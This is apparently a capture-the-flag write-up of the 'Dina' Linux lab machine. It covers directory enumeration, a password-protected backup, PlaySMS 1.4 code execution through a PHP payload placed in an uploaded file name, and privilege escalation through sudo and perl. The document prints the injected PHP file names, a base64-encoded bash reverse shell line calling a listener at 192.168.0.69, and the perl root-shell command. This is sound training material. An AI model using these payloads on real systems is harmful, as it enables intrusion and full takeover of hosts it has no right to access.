Dina is an easy Linux machine that can be exploited via Play SMS through PHP code execution. Even though the machine can be easily exploited it was a bit of a challenge for me to get a reverse shell since there is a limitation of not being able to use forward slashes, however the process could be simplified if using Metasploit. Privilege escalation is very easy and consists of elevating privileges using the sudo command and Perl to spawn a shell. Overall Dina was very fun and gave me the opportunity to learn about how useful encoding can be to bypass limitations.
Scanning And Enumeration
An nmap scan on all TCP ports returns only one open port as being an HTTP service.
Browsing to the web service displays the following page.
Looking at the nmap results we see that there is some entries in the robots.txt file which we could access, the directory of interest was the /nothing directory and it displays the following when browsed.
Nothing interesting there so far, but if we look at the source code there is a list of some passwords that could be used at a later stage.
At this stage, there was nothing else visible that would give me access to anything else yet. Using gobuster however, I was able to get one more directory that we could browse to it.
Browsing to this directory shows a backup.zip file that I thought it would contain some good information, so I downloaded it to my machine.
At first I was trying to use unzip to extract the contents of the file but I kept getting an error, instead of using unzip I found out that 7za could do the job as well. I extracted the contents of the file using 7za as follows:
7za x backup.zip
When asked for a password I went back to the passwords I had found before and was able to extract its contents with the password “freedom”.
The file itself had a file type of mp3 even though the file was very small. Using the cat command against the extracted file reveals a username and a new directory to browse.
Browsing to the new directory displays the following login page:
From the extracted file we know that the username is “touhid” but the password is not there. If we remember, we found some passwords before and one of them may work for the username we have. After trying some of the passwords, I was able to login using the password “diana”.
We can see that the we are dealing with PlaySMS with is an open source software that handles outgoing and incoming SMS. While I wasn’t able to enumerate the version number if we search for public exploits for playSMS there is only one POC for a vulnerability found in PlaySMS 1.4. This is the link https://www.exploit-db.com/exploits/42003. The vulnerability basically consists of uploading a PHP file with the payload being the name of the file instead of its contents, this works because the server sets a parameters of $filename to the name of the file (which is the remote code execution in this case). Please read the information from the URL for more information.
To get RCE (remote command execution) we would need to browse to the “My account” and then “Send from file” and we should get the following page to upload a file.
I created a file to execute the id command with the touch command as follows:
touch "<?php system('id'); dia();?>.php"
I then uploaded the file to the server and was able to successfully see command execution.
My original plan to get a reverse shell was to simply execute a bash reverse shell or download a PHP reverse shell to the target machine but since we are using the name of the file to get RCE we can’t use the forward slash as a file name. To overcome this limitation I remembered seeing a technique before where the payload is converted to base64 to then be decoded and executed by the target. The reverse shell I will be using is a bash reverse shell as follows:
bash -i >& /dev/tcp/192.168.0.69/443 0>&1
I then took that bash reverse shell and converted to base64 format using the following command:
echo 'bash -i >& /dev/tcp/192.168.0.69/443 0>&1' | base64
I then created the file that was going to be uploaded as follows:
touch "<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNjkvNDQzIDA+JjEK | base64 -d | bash'); dia();?>.php"
The command above basically echos the base64 encoded reverse shell, it then decodes the string with the “base64 -d” command and it’s then finally executed with bash. Uploading this file to the server and setting up a netcat listener I was able to successfully received a reverse shell as www-data.
Privilege escalation was very simple as it can be easily identified with the “sudo -l” command, a command that should almost be one of the first things to check for sudo permissions. Issuing the command we can see from the screenshot below that we are allowed to use sudo when using perl.
To take advantage of this permission we would simple spawn a shell using perl with the complete path described above in the screenshot with sudo. This can be accomplished using the following command:
sudo /usr/bin/perl -e 'exec "/bin/sh";'
Even though it doesn’t return any output if we type id we would see that we are now root.